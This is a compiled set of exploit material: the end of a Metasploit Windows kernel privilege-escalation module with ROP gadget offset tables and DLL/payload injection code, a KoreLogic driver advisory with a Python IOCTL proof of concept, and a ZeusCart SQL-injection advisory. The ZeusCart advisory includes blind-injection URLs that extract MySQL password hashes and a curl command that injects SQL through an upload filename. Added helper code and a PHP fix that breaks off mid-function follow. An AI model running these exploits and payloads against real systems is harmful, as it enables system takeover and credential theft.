          'mov_rax_r11_ret'     => 0x7010e,  # mov rax, r11 # ret # 49 8B C3 C3
          'add_rax_rcx_ret'     => 0xecd7b,  # add rax, rcx # ret # 48 03 C1 C3
          'pop_rsp_ret'         => 0x71380,  # pop rsp # ret # 5c c3
          'xchg_rax_rsp_adjust' => 0x178c84, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
          'chwnd_delete'        => 0x1513D8  # CHwndTargetProp::Delete
        }
      when '6.3.9600.17796'
        {
          'info_leak'           => 0x3d000,
          'pop_rax_ret'         => 0x19e4f,  # pop rax # ret # 58 C3
          'xchg_rax_rsp'        => 0x5f64,   # xchg eax, esp # ret # 94 C3
          'allocate_pool'       => 0x352220, # import entry nt!ExAllocatePoolWithTag
          'pop_rcx_ret'         => 0x97a5e,  # pop rcx # ret # 59 C3
          'deref_rax_into_rcx'  => 0xc3aa7,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
          'mov_rax_into_rcx'    => 0xc3aaa,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x1B20,   # pop rbx # ret # 5B C3
          'ret'                 => 0x1B21,   # ret C3
          'mov_rax_r11_ret'     => 0x7010e,  # mov rax, r11 # ret # 49 8B C3 C3
          'add_rax_rcx_ret'     => 0xecf8b,  # add rax, rcx # ret # 48 03 C1 C3
          'pop_rsp_ret'         => 0x29fd3,  # pop rsp # ret # 5c c3
          'xchg_rax_rsp_adjust' => 0x1789e4, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
          'chwnd_delete'        => 0x150F58  # CHwndTargetProp::Delete
        }
      when '6.3.9600.17837'
        {
          'info_leak'           => 0x3d800,
          'pop_rax_ret'         => 0x1a51f,  # pop rax # ret # 58 C3
          'xchg_rax_rsp'        => 0x62b4,   # xchg eax, esp # ret # 94 C3
          'allocate_pool'       => 0x351220, # import entry nt!ExAllocatePoolWithTag
          'pop_rcx_ret'         => 0x97a4a,  # pop rcx # ret # 59 C3
          'deref_rax_into_rcx'  => 0xc3687,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
          'mov_rax_into_rcx'    => 0xc368a,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x14db,   # pop rbx # ret # 5B C3
          'ret'                 => 0x14dc,   # ret C3
          'mov_rax_r11_ret'     => 0x94871,  # mov rax, r11 # ret # 49 8B C3 C3
          'add_rax_rcx_ret'     => 0xecbdb,  # add rax, rcx # ret # 48 03 C1 C3
          'pop_rsp_ret'         => 0xbd2c,   # pop rsp # ret # 5c c3
          'xchg_rax_rsp_adjust' => 0x15e84c, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
          'chwnd_delete'        => 0x15A470  # CHwndTargetProp::Delete
        }
      when '6.3.9600.17915'
        {
          'info_leak'           => 0x3d800,
          'pop_rax_ret'         => 0x1A4EF,  # pop rax # ret # 58 C3
          'xchg_rax_rsp'        => 0x62CC,   # xchg eax, esp # ret # 94 C3
          'allocate_pool'       => 0x351220, # import entry nt!ExAllocatePoolWithTag
          'pop_rcx_ret'         => 0x9765A,  # pop rcx # ret # 59 C3
          'deref_rax_into_rcx'  => 0xC364F,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
          'mov_rax_into_rcx'    => 0xC3652,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x14DB,   # pop rbx # ret # 5B C3
          'ret'                 => 0x14DC,   # ret # C3
          'mov_rax_r11_ret'     => 0x7060e,  # mov rax, r11 # ret # 49 8B C3 C3
          'add_rax_rcx_ret'     => 0xECDCB,  # add rax, rcx # ret # 48 03 C1 C3
          'pop_rsp_ret'         => 0xbe33,   # pop rsp # ret # 5c c3
          'xchg_rax_rsp_adjust' => 0x15e5fc, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
          'chwnd_delete'        => 0x15A220  # CHwndTargetProp::Delete
        }
      else
        nil
      end
    end.call(@win32k)
  end

  def patch_nt_offsets(dll)
    @nt_offsets.each do |k, v|
      case k
      when 'set_cr4'
        dll.gsub!([0xdeedbeefdeedbe0e].pack('Q<'), [v].pack('Q<'))
      when 'allocate_pool_with_tag'
        dll.gsub!([0xdeedbeefdeedbe0f].pack('Q<'), [v].pack('Q<'))
      end
    end
  end

  def set_nt_offsets
    @nt_offsets ||= Proc.new do |version|
      case version
      when '6.3.9600.17415'
        {
          'set_cr4'                => 0x38a3cc, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
          'allocate_pool_with_tag' => 0x2a3a50  # ExAllocatePoolWithTag
        }
      when '6.3.9600.17630'
        {
          'set_cr4'                => 0x38A3BC, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
          'allocate_pool_with_tag' => 0x2A3A50  # ExAllocatePoolWithTag
        }
      when '6.3.9600.17668'
        {
          'set_cr4'                => 0x38A3BC, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
          'allocate_pool_with_tag' => 0x2A3A50  # ExAllocatePoolWithTag
        }
      when '6.3.9600.17936'
        {
          'set_cr4'                => 0x3863bc, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
          'allocate_pool_with_tag' => 0x29FA50  # ExAllocatePoolWithTag
        }
      else
        nil
      end
    end.call(@ntoskrnl)
  end

  def atmfd_version
    file_path = expand_path('%windir%') << '\\system32\\atmfd.dll'
    major, minor, build, revision, branch = file_version(file_path)
    return nil if major.nil?

    ver = "#{major}.#{minor}.#{build}.#{revision}"
    vprint_status("atmfd.dll file version: #{ver} branch: #{branch}")

    ver
  end

  def win32k_version
    file_path = expand_path('%windir%') << '\\system32\\win32k.sys'
    major, minor, build, revision, branch = file_version(file_path)
    return nil if major.nil?

    ver = "#{major}.#{minor}.#{build}.#{revision}"
    vprint_status("win32k.sys file version: #{ver} branch: #{branch}")

    ver
  end

  def ntoskrnl_version
    file_path = expand_path('%windir%') << '\\system32\\ntoskrnl.exe'
    major, minor, build, revision, branch = file_version(file_path)
    return nil if major.nil?

    ver = "#{major}.#{minor}.#{build}.#{revision}"
    vprint_status("ntoskrnl.exe file version: #{ver} branch: #{branch}")

    ver
  end

  def check
    # We have tested only windows 8.1
    if sysinfo['OS'] !~ /Windows 8/i
      return Exploit::CheckCode::Unknown
    end

    # We have tested only 64 bits
    if sysinfo['Architecture'] !~ /(wow|x)64/i
      return Exploit::CheckCode::Unknown
    end

    atmfd = atmfd_version
    # atmfd 5.1.2.238 => Works
    unless atmfd && Gem::Version.new(atmfd) <= Gem::Version.new('5.1.2.243')
      return Exploit::CheckCode::Safe
    end

    # win32k.sys 6.3.9600.17393 => Works
    @win32k = win32k_version
    unless @win32k && WIN32K_VERSIONS.include?(@win32k)
      return Exploit::CheckCode::Detected
    end

    # ntoskrnl.exe 6.3.9600.17415 => Works
    @ntoskrnl = ntoskrnl_version
    unless @ntoskrnl && NT_VERSIONS.include?(@ntoskrnl)
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Appears
  end

  def exploit
    print_status('Checking target...')
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    check_result = check
    if check_result == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, 'Target not vulnerable')
    end
    if check_result == Exploit::CheckCode::Unknown
      fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
    end
    if check_result == Exploit::CheckCode::Detected
      fail_with(Failure::NotVulnerable, 'ROP chain not available for the target nt/win32k')
    end

    unless get_target_arch == ARCH_X86_64
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
    end

    print_status("Exploiting with win32k #{@win32k} and nt #{@ntoskrnl}...")
    set_win32k_offsets
    fail_with(Failure::NoTarget, 'win32k.sys offsets not available') if @win32k_offsets.nil?
    set_nt_offsets
    fail_with(Failure::NoTarget, 'ntoskrnl.exe offsets not available') if @nt_offsets.nil?

    begin
      print_status('Launching notepad to host the exploit...')
      notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
      print_good("Process #{process.pid} launched.")
    rescue Rex::Post::Meterpreter::RequestError
      # Sandboxes may not allow creating a new process
      # stdapi_sys_process_execute: Operation failed: Access is denied.
      print_status('Operation failed. Trying to elevate the current process...')
      process = client.sys.process.open
    end

    library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-2426', 'reflective_dll.x64.dll')
    library_path = ::File.expand_path(library_path)

    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
    dll = ''
    ::File.open(library_path, 'rb') { |f| dll = f.read }

    patch_win32k_offsets(dll)
    patch_nt_offsets(dll)

    exploit_mem, offset = inject_dll_data_into_process(process, dll)

    print_status("Exploit injected. Injecting payload into #{process.pid}...")
    payload_mem = inject_into_process(process, payload.encoded)

    # invoke the exploit, passing in the address of the payload that
    # we want invoked on successful exploitation.
    print_status('Payload injected. Executing exploit...')
    process.thread.create(exploit_mem + offset, payload_mem)

    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  end
end
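The module's `patch_win32k_offsets` / `patch_nt_offsets` rewrite 0xdeedbeefdeedbe00..0f markers inside the reflective DLL with the gadget offsets for the detected win32k.sys and ntoskrnl.exe builds. A plain `gsub!` is silent when a marker is absent (a rebuilt DLL) or when a version table lacks a key (a typo in a new entry), and the ROP chain then runs with a marker value as a kernel address. The example below is added here and is not the module's code: the same marker scheme, with a patcher that insists on exactly one occurrence per marker and a complete offset table, plus a constructed stand-in blob in place of reflective_dll.x64.dll so it runs offline.

```python
import struct

# Marker scheme used by the module above: one unique little-endian QWORD per offset name.
WIN32K_MARKERS = {
    "info_leak":           0xdeedbeefdeedbe00,
    "pop_rax_ret":         0xdeedbeefdeedbe01,
    "xchg_rax_rsp":        0xdeedbeefdeedbe02,
    "allocate_pool":       0xdeedbeefdeedbe03,
    "pop_rcx_ret":         0xdeedbeefdeedbe04,
    "deref_rax_into_rcx":  0xdeedbeefdeedbe05,
    "mov_rax_into_rcx":    0xdeedbeefdeedbe06,
    "pop_rbx_ret":         0xdeedbeefdeedbe07,
    "ret":                 0xdeedbeefdeedbe08,
    "mov_rax_r11_ret":     0xdeedbeefdeedbe09,
    "add_rax_rcx_ret":     0xdeedbeefdeedbe0a,
    "pop_rsp_ret":         0xdeedbeefdeedbe0b,
    "xchg_rax_rsp_adjust": 0xdeedbeefdeedbe0c,
    "chwnd_delete":        0xdeedbeefdeedbe0d,
}
NT_MARKERS = {
    "set_cr4":                0xdeedbeefdeedbe0e,
    "allocate_pool_with_tag": 0xdeedbeefdeedbe0f,
}


def patch_offsets(blob, markers, offsets):
    """Replace every marker in blob with its offset and return the patched bytes.

    Unlike a bare gsub!, this fails loudly when a marker is missing or duplicated in the
    blob, or when the offset table lacks an entry, so a half-patched chain never ships."""
    missing = sorted(set(markers) - set(offsets))
    if missing:
        raise KeyError("no offset for: " + ", ".join(missing))
    out = bytearray(blob)
    for name, marker in markers.items():
        needle = struct.pack("<Q", marker)
        count = out.count(needle)
        if count != 1:
            raise ValueError("marker %s (%#x) occurs %d times, expected exactly once" % (name, marker, count))
        out = out.replace(needle, struct.pack("<Q", offsets[name]))
    return bytes(out)


def unpatched_markers(blob, markers):
    """Names of markers still present in blob; must be empty after patching."""
    return sorted(n for n, m in markers.items() if struct.pack("<Q", m) in blob)


def make_demo_blob(markers):
    """Constructed stand-in for reflective_dll.x64.dll: NOP filler with each marker embedded once."""
    parts = []
    for i, (name, marker) in enumerate(sorted(markers.items())):
        parts.append(b"\x90" * (3 + i))
        parts.append(struct.pack("<Q", marker))
    return b"".join(parts)


if __name__ == "__main__":
    # Offsets are illustrative here; the real values are the per-build tables in the module.
    demo_offsets = {name: 0x1000 + i for i, name in enumerate(sorted(WIN32K_MARKERS))}
    blob = make_demo_blob(WIN32K_MARKERS)
    patched = patch_offsets(blob, WIN32K_MARKERS, demo_offsets)
    print("patched %d bytes, leftover markers: %s" % (len(patched), unpatched_markers(patched, WIN32K_MARKERS)))
```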
-
VBox Satellite Express 2.3.17.3 - Arbitrary Write
KL-001-2015-005 : VBox Satellite Express Arbitrary Write Privilege Escalation

Title: VBox Satellite Express Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2015-005
Publication Date: 2015.09.16
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-005.txt

1. Vulnerability Details

Affected Vendor: VBox Communications
Affected Product: Satellite Express Protocol
Affected Version: 2.3.17.3
Platform: Microsoft Windows XP SP3, Microsoft Windows 7 (x86)
CWE Classification: CWE-123: Write-what-where condition
Impact: Arbitrary Code Execution
Attack vector: IOCTL
CVE-ID: CVE-2015-6923

2. Vulnerability Description

A vulnerability within the ndvbs module allows an attacker to write memory they control to an arbitrary location they define. This vulnerability can be used to overwrite function pointers in HalDispatchTable, resulting in an elevation of privilege.

3. Technical Description

Example against Windows XP:

Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS
Built by: 2600.xpsp_sp3_qfe.101209-1646
Machine Name:
Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0
Debug session time: Tue Mar 10 18:57:54.259 2015 (UTC - 7:00)
System Uptime: 0 days 0:11:19.843

*********************************************************************
*                                                                   *
*                        Bugcheck Analysis                          *
*                                                                   *
*********************************************************************

Use !analyze -v to get detailed debugging information.

BugCheck 50, {b41c5d4c, 0, 805068e1, 0}

Probably caused by : ndvbs.sys ( ndvbs+94f )

Followup: MachineOwner
---------

kd> kn
Call stack:
 # ChildEBP RetAddr
00 f64fda98 8051cc7f nt!KeBugCheckEx+0x1b
01 f64fdaf8 805405d4 nt!MmAccessFault+0x8e7
02 f64fdaf8 805068e1 nt!KiTrap0E+0xcc
03 f64fdbb0 80506aae nt!MmMapLockedPagesSpecifyCache+0x211
04 f64fdbd0 f650e94f nt!MmMapLockedPages+0x18
05 f64fdc34 804ee129 ndvbs+0x94f
06 f64fdc44 80574e56 nt!IopfCallDriver+0x31
07 f64fdc58 80575d11 nt!IopSynchronousServiceTail+0x70
08 f64fdd00 8056e57c nt!IopXxxControlFile+0x5e7
09 f64fdd34 8053d6d8 nt!NtDeviceIoControlFile+0x2a
0a f64fdd34 7c90e514 nt!KiFastCallEntry+0xf8
0b 0021f3e4 7c90d28a ntdll!KiFastSystemCallRet
0c 0021f3e8 1d1add7a ntdll!ZwDeviceIoControlFile+0xc
0d 0021f41c 1d1aca96 _ctypes!DllCanUnloadNow+0x5b4a
0e 0021f44c 1d1a8db8 _ctypes!DllCanUnloadNow+0x4866
0f 0021f4fc 1d1a959e _ctypes!DllCanUnloadNow+0xb88
10 0021f668 1d1a54d8 _ctypes!DllCanUnloadNow+0x136e
11 0021f6c0 1e07bd9c _ctypes+0x54d8
12 00000000 00000000 python27!PyObject_Call+0x4c

Example against Windows 7:

Microsoft (R) Windows Debugger Version 6.3.9600.17298 X86
Copyright (c) Microsoft Corporation. All rights reserved.

Windows 7 Kernel Version 7601 (Service Pack 1) UP Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS Personal
Built by: 7601.17514.x86fre.win7sp1_rtm.101119-1850
Kernel base = 0x8280c000 PsLoadedModuleList = 0x82956850
Debug session time: Tue Sep 15 15:08:38.938 2015 (UTC - 7:00)
System Uptime: 0 days 0:27:26.358

kd> .symfix;.reload
Loading Kernel Symbols
...............................................................
................................................................
........................
Loading User Symbols
Loading unloaded module list
........

kd> !analyze -v
**********************************************************************
*                                                                    *
*                        Bugcheck Analysis                           *
*                                                                    *
**********************************************************************

KERNEL_MODE_EXCEPTION_NOT_HANDLED_M (1000008e)
This is a very common bugcheck. Usually the exception address pinpoints
the driver/function that caused the problem. Always note this address
as well as the link date of the driver/image that contains this address.
Some common problems are exception code 0x80000003. This means a hard
coded breakpoint or assertion was hit, but this system was booted
/NODEBUG. This is not supposed to happen as developers should never have
hardcoded breakpoints in retail code, but ...
If this happens, make sure a debugger gets connected, and the
system is booted /DEBUG. This will let us see why this breakpoint is
happening.
Arguments:
Arg1: c0000005, The exception code that was not handled
Arg2: 929ef938, The address that the exception occurred at
Arg3: 974f4a34, Trap Frame
Arg4: 00000000

Debugging Details:
------------------

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

FAULTING_IP:
ndvbs+938
929ef938 8b4604          mov     eax,dword ptr [esi+4]

TRAP_FRAME:  974f4a34 -- (.trap 0xffffffff974f4a34)
ErrCode = 00000000
eax=00000000 ebx=85490880 ecx=85de2ae0 edx=85490810 esi=85490810 edi=8460a668
eip=929ef938 esp=974f4aa8 ebp=974f4afc iopl=0         nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010246
ndvbs+0x938:
929ef938 8b4604          mov     eax,dword ptr [esi+4]
Resetting default scope

CUSTOMER_CRASH_COUNT:  1
DEFAULT_BUCKET_ID:  WIN7_DRIVER_FAULT
BUGCHECK_STR:  0x8E
PROCESS_NAME:  python.exe
CURRENT_IRQL:  0
ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) x86fre
LAST_CONTROL_TRANSFER:  from 82843593 to 929ef938

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
974f4afc 82843593 85de2a28 85490810 85490810 ndvbs+0x938
974f4b14 82a3799f 8460a668 85490810 85490880 nt!IofCallDriver+0x63
974f4b34 82a3ab71 85de2a28 8460a668 00000000 nt!IopSynchronousServiceTail+0x1f8
974f4bd0 82a813f4 85de2a28 85490810 00000000 nt!IopXxxControlFile+0x6aa
974f4c04 8284a1ea 00000078 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
974f4c04 76fa70b4 00000078 00000000 00000000 nt!KiFastCallEntry+0x12a
0021f99c 00000000 00000000 00000000 00000000 0x76fa70b4

STACK_COMMAND:  kb

FOLLOWUP_IP:
ndvbs+938
929ef938 8b4604          mov     eax,dword ptr [esi+4]

SYMBOL_STACK_INDEX:  0
SYMBOL_NAME:  ndvbs+938
FOLLOWUP_NAME:  MachineOwner
MODULE_NAME: ndvbs
IMAGE_NAME:  ndvbs.sys
DEBUG_FLR_IMAGE_TIMESTAMP:  3ec77b36
BUCKET_ID:  OLD_IMAGE_ndvbs.sys
FAILURE_BUCKET_ID:  OLD_IMAGE_ndvbs.sys
ANALYSIS_SOURCE:  KM
FAILURE_ID_HASH_STRING:  km:old_image_ndvbs.sys
FAILURE_ID_HASH:  {e5b892ba-cc2c-e4a4-9b6e-5e8b63660e75}

Followup: MachineOwner
---------

4. Mitigation and Remediation Recommendation

No response from vendor; no remediation available.

5. Credit

This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc.

6. Disclosure Timeline

2015.05.19 - KoreLogic requests a security contact from info@vboxcomm.com.
2015.05.29 - KoreLogic requests a security contact from {info,sales,marketing}@vboxcomm.com.
2015.08.03 - 45 business days have elapsed since KoreLogic's last contact attempt.
2015.09.11 - KoreLogic requests CVE from Mitre.
2015.09.12 - Mitre issues CVE-2015-6923.
2015.09.16 - Public disclosure.

7. Proof of Concept

from sys import exit
from ctypes import *

NtAllocateVirtualMemory = windll.ntdll.NtAllocateVirtualMemory
WriteProcessMemory = windll.kernel32.WriteProcessMemory
DeviceIoControl = windll.ntdll.NtDeviceIoControlFile
CreateFileA = windll.kernel32.CreateFileA
CloseHandle = windll.kernel32.CloseHandle

FILE_SHARE_READ, FILE_SHARE_WRITE = 0, 1
OPEN_EXISTING = 3
NULL = None

device = "ndvbs"
code = 0x00000ffd       # IOCTL code that reaches the vulnerable dispatch path
inlen = 0x0
outlen = 0x0
inbuf = 0x1
outbuf = 0xffff0000     # kernel-range address handed to the driver as the output buffer
inBufMem = "\x90" * inlen

def main():
    try:
        handle = CreateFileA("\\\\.\\%s" % (device), FILE_SHARE_WRITE|FILE_SHARE_READ, 0, None, OPEN_EXISTING, 0, None)
        if (handle == -1):
            print "[-] error creating handle"
            exit(1)
    except Exception as e:
        print "[-] error creating handle"
        exit(1)
    #NtAllocateVirtualMemory(-1,byref(c_int(inbuf)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)
    # NtDeviceIoControlFile(FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock,
    #                       IoControlCode, InputBuffer, InputBufferLength, OutputBuffer, OutputBufferLength)
    DeviceIoControl(handle, NULL, NULL, NULL, byref(c_ulong(8)), code, inbuf, inlen, outbuf, outlen)
    CloseHandle(handle)
    return False

if __name__ == "__main__":
    main()

The contents of this advisory are copyright(c) 2015 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt
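The PoC sends IOCTL 0x00000ffd with a kernel-range address (0xffff0000) as the output buffer. An IOCTL code is four packed fields (device type, required access, function number, transfer method), and decoding them is the first thing to do when triaging a crash like the two above: 0xffd is device type 0, function 0x3ff, FILE_ANY_ACCESS, METHOD_IN_DIRECT. Direct methods describe the caller's output buffer with an MDL rather than copying it, which is consistent with the nt!MmMapLockedPages frame directly below ndvbs+0x94f in the XP stack. The example below is added here and is not part of the KoreLogic advisory; it implements the CTL_CODE packing from winioctl.h and its inverse, plus a helper that lists the same function number under the other three transfer methods, which is a common follow-up check when a driver dispatches on the function number alone.

```python
# CTL_CODE field layout (winioctl.h): DeviceType[31:16] | Access[15:14] | Function[13:2] | Method[1:0]
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT", 2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS", 2: "FILE_WRITE_ACCESS",
          3: "FILE_READ_ACCESS | FILE_WRITE_ACCESS"}


def ctl_code(device_type, function, method, access):
    """Pack the four fields exactly as the CTL_CODE() macro does."""
    if not (0 <= device_type <= 0xFFFF and 0 <= function <= 0xFFF and 0 <= method <= 3 and 0 <= access <= 3):
        raise ValueError("CTL_CODE field out of range")
    return (device_type << 16) | (access << 14) | (function << 2) | method


def decode_ioctl(code):
    """Split a 32-bit IOCTL code back into its CTL_CODE fields."""
    if not 0 <= code <= 0xFFFFFFFF:
        raise ValueError("not a 32-bit IOCTL code")
    return {
        "device_type": code >> 16,
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": code & 0x3,
    }


def describe_ioctl(code):
    """Human-readable summary, e.g. for a crash-triage note."""
    f = decode_ioctl(code)
    return "0x%08X: device_type=0x%04X function=0x%03X %s %s" % (
        code, f["device_type"], f["function"], METHODS[f["method"]], ACCESS[f["access"]])


def sibling_codes(code):
    """The same device type, function and access under each of the four transfer methods.

    Useful when checking whether a driver switches on the function number only and ignores the
    method bits, in which case the METHOD_NEITHER variant hands it raw user pointers."""
    f = decode_ioctl(code)
    return [ctl_code(f["device_type"], f["function"], m, f["access"]) for m in range(4)]


if __name__ == "__main__":
    print(describe_ioctl(0x00000ffd))        # the code used by the PoC above
    for c in sibling_codes(0x00000ffd):
        print("  " + describe_ioctl(c))
```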
-
ZeusCart 4.0 - SQL Injection
ZeusCart 4.0: SQL Injection
Security Advisory – Curesec Research Team

1. Introduction

Affected Product:    ZeusCart 4.0
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Contact:      support@zeuscart.com
Vulnerability Type:  SQL Injection
Remote Exploitable:  Yes
Reported to vendor:  08/13/2015
Disclosed to public: 09/14/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Vulnerability Description

There are at least two SQL injections in ZeusCart 4.0: one is a blind injection that does not require credentials to exploit, the other is a standard injection in the admin area. Because the prevention of SQL injection relies to a large part on applying simple filters to most input instead of using prepared statements, it is highly likely that there are more SQL injection vulnerabilities that are not covered here.

3. Timing based Blind SQL Injection

There is a blind, timing-based SQL injection into the maincatid argument. An attacker does not need to be authenticated to exploit this.

Proof Of Concept

http://localhost/zeuscart-master/index.php?do=featured&action=showmaincatlanding&maincatid=-1 AND IF(SUBSTRING(version(), 1, 1)=5,BENCHMARK(500000000,version()),null)
-> true

http://localhost/zeuscart-master/index.php?do=featured&action=showmaincatlanding&maincatid=-1 AND IF(SUBSTRING(version(), 1, 1)=4,BENCHMARK(500000000,version()),null)
-> false

Please note that there is a bug when displaying featured items, so this will display an error message or show a blank page. The timing difference is still present and can thus be exploited, but content-based exploitation is not possible because of this. Also note that quotes may not be used in the payload, as quotes are sanitized.

It is still possible to extract data:

http://localhost/zeuscart-master/index.php?do=featured&action=showmaincatlanding&maincatid=-1 AND IF(ascii(substring((SELECT password from mysql.user limit 0,1),1,1))=42,BENCHMARK(500000000,version()),null)
-> true, password hash starts with *

Code

/classes/Core/CFeaturedItems.php:52
    $maincatid = $_GET['maincatid'];
    [...]
    $sql = "SELECT DISTINCT a.category_name AS Category,a.category_id AS maincatid, b.category_name AS SubCategory, b.category_id as subcatid, b.category_image AS image FROM category_table a INNER JOIN category_table b ON a.category_id = b.category_parent_id WHERE b.category_parent_id=".$maincatid." AND b.category_status=1 ";

4. SQL Injection in Admin Area

All GET, POST, and REQUEST input is sanitized via filter_var($value, FILTER_SANITIZE_STRING), which offers some protection against SQL injection and XSS but is not recommended as the only defense. For many queries there is no further defense via escaping or prepared statements. This makes all queries that get their data from sources other than GET, POST, and REQUEST (such as FILES), and all queries containing unquoted parameters (such as the one in the blind injection above), vulnerable.

Proof Of Concept

The steps to reproduce this issue are as follows:

Log in as admin.
Create a new product, using a file name for ufile[0] like: "image.jpgblla', description=(SELECT password FROM mysql.user limit 0,1), image='test
Visiting http://localhost/zeuscart-master/admin/index.php?do=aprodetail&action=showprod&prodid=PRODUCTID will give the result of the injected query.

Curl command to create a new product:

curl -i -s -k -X 'POST' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0' -H 'DNT: 1' -H 'Content-Type: multipart/form-data; boundary=--------2025782171' \
  -b 'PHPSESSID=hsa73tae4bq4ev381430dbfif0' \
  --data-binary $'----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0aChoose Category\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0a25\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"product_title\"\x0d\x0a\x0d\x0aMYTESTPRODUCT2\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"sku\"\x0d\x0a\x0d\x0a77\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"txtweight\"\x0d\x0a\x0d\x0a77\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"status\"\x0d\x0a\x0d\x0aon\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"ufile[0]\"; filename=\"image.jpgblla\', description=(SELECT password FROM mysql.user limit 0,1), image=\'test\"\x0d\x0aContent-Type: image/jpeg\x0d\x0a\x0d\x0acontent\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"price\"\x0d\x0a\x0d\x0a555\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"msrp_org\"\x0d\x0a\x0d\x0a555\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"soh\"\x0d\x0a\x0d\x0a555\x0d\x0a----------2025782171--\x0d\x0a' \
  'http://localhost/zeuscart-master/admin/index.php?do=productentry&action=insert'

Code

CProductEntry.php:313
    $imgfilename= $_FILES['ufile']['name'][$i];
    $imagefilename = date("Y-m-d-His").$imgfilename ; // generate a new name
    $image="images/products/". $imagefilename; // updated into DB
    [...]
    if($i==0) {
        $imgType='main';
        $update="UPDATE products_table set image='$image',thumb_image='$thumb_image',large_image_path='$large_image' where product_id='".$product_id."'";
        $obj->updateQuery($update);
    } else {
        $imgType='sub';
    }
    if($_FILES['ufile']['name'][$i]!='') {
        $query_img="INSERT INTO product_images_table(product_id,image_path,thumb_image_path,type,large_image_path) VALUES('".$product_id."','$image','$thumb_image','$imgType','$large_image')";
        $obj_img=new Bin_Query();
        $obj_img->updateQuery($query_img);
    }
}

5. Solution

This issue was not fixed by the vendor.

6. Report Timeline

08/13/2015 Informed Vendor about Issue (no reply)
09/07/2015 Reminded Vendor of release date (no reply)
09/14/2015 Disclosed to public

7. Blog Reference

http://blog.curesec.com/article/blog/ZeusCart-40-SQL-Injection-56.html
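The fix the advisory asks for, as an added example that is not ZeusCart's code: the two quoted queries rewritten with PDO prepared statements, so that neither the unquoted maincatid nor the unfiltered $_FILES name can reach the SQL parser as syntax. Table and column names come from the advisory; the DSN, credentials and function names are assumptions.

```php
<?php
// Added example (not ZeusCart code): hardened versions of the two queries in
// the advisory. DSN, credentials and function names are assumptions.

function db(): PDO
{
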